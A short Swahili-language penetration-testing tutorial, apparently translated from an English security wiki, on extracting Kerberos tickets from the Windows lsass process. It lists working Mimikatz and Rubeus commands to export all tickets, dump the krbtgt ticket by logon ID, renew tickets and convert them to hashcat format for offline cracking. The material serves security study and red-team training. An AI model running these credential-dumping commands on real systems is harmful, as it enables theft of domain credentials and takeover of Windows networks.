Tiketi kwenye Windows zinasimamiwa na kuhifadhiwa na mchakato wa lsass (Local Security Authority Subsystem Service), ambao unahusika na kushughulikia sera za usalama. Ili kuvuna tiketi hizi, ni lazima kuwasiliana na mchakato wa lsass. Mtumiaji asiye na mamlaka anaweza tu kupata tiketi zao wenyewe, wakati msimamizi ana uwezo wa kuvuna tiketi zote kwenye mfumo. Kwa operesheni kama hizo, zana za Mimikatz na Rubeus zinatumika sana, kila moja ikiwa na amri na utendaji tofauti.

Mimikatz

Mimikatz ni zana yenye uwezo ambayo inaweza kuingiliana na usalama wa Windows. Inatumika sio tu kwa kuvuna tiketi lakini pia kwa operesheni mbalimbali zinazohusiana na usalama.

# Extracting tickets using Mimikatz
sekurlsa::tickets /export

Rubeus

Rubeus ni chombo kilichoundwa mahsusi kwa ajili ya mwingiliano na udhibiti wa Kerberos. Hutumika kwa ajili ya kuchota na kushughulikia tiketi, pamoja na shughuli nyingine zinazohusiana na Kerberos.

# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>

Unapotumia amri hizi, hakikisha kubadilisha nafasi zilizowekwa kama <BASE64_TICKET> na <luid> na tiketi iliyosimbwa kwa Base64 na Kitambulisho cha Ingia mtawaliwa. Zana hizi zinatoa utendaji mpana kwa kusimamia tiketi na kuingiliana na mifumo ya usalama ya Windows.

Marejeo

• https://www.tarlogic.com/en/blog/how-to-attack-kerberos/